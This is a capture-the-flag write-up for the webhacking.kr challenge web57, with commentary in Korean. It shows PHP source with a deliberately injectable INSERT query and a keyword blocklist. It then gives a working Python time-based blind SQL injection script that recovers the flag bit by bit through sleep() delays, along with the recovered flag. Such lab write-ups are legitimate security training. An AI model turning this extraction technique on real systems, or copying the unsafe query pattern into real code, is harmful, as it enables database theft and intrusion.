Webhacking.kr - web57
web57
1
2
3
4
5
6
7
8
9
10
11
<?php
$db = dbconnect();
if($_GET['msg'] && isset($_GET['se'])){
$_GET['msg'] = addslashes($_GET['msg']);
$_GET['se'] = addslashes($_GET['se']);
if(preg_match("/select|and|or|not|&|\||benchmark/i",$_GET['se'])) exit("Access Denied");
mysqli_query($db,"insert into chall57(id,msg,pw,op) values('{$_SESSION['id']}','{$_GET['msg']}','{$flag}',{$_GET['se']})");
echo "Done<br><br>";
if(rand(0,100) == 1) mysqli_query($db,"delete from chall57");
}
?>
Solution
1
2
3
4
5
6
7
8
9
우리는 chall57 테이블에 있는 pw 컬럼 값을 뽑아오면 됨.
sleep 함수를 이용한 time based blind sql injection으로 가능함.
se=if(length(pw)>1,sleep(2),2) -> sleep(2) 실행
이렇게 해서 구하면 flag 길이는 24.
이제 비밀번호 값을 구하면 됨.
se=if(ascii(substr(pw,1,1))>48,sleep(1),1)
확실하게 하기 위해서 5초로 함.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
import requests
import time
url='https://webhacking.kr/challenge/web-34/'
headers={'Content-Type': 'application/x-www-form-urlencoded'}
cookies={'PHPSESSID' : '[redacted]'}
flag_bit=''
flag=''
for i in range(1, 25):
payload={'msg':'hi', 'se':'if(length(bin(ascii(substr(pw,'+str(i)+',1))))=6,sleep(5),1)'}
t1=time.time()
res=requests.get(url,params=payload,headers=headers, cookies=cookies)
t2=time.time()
if t2-t1 > 5 :
bitlen=6
else :
bitlen=7
for j in range(1, bitlen+1):
payload={'msg':'hi','se':'if(substr(bin(ascii(substr(pw,'+str(i)+',1))),'+str(j)+',1)=0,sleep(5),1)'}
t3=time.time()
res=requests.get(url, params=payload, cookies=cookies, headers=headers)
t4=time.time()
if t4-t3 > 5 :
flag_bit+='0'
else :
flag_bit+='1'
flag+=chr(int(flag_bit,2))
print("flag :",flag)
flag_bit=''
1
flag : FLAG{y2u.be/kmPgjr0EL64}
This post is licensed under CC BY 4.0 by the author.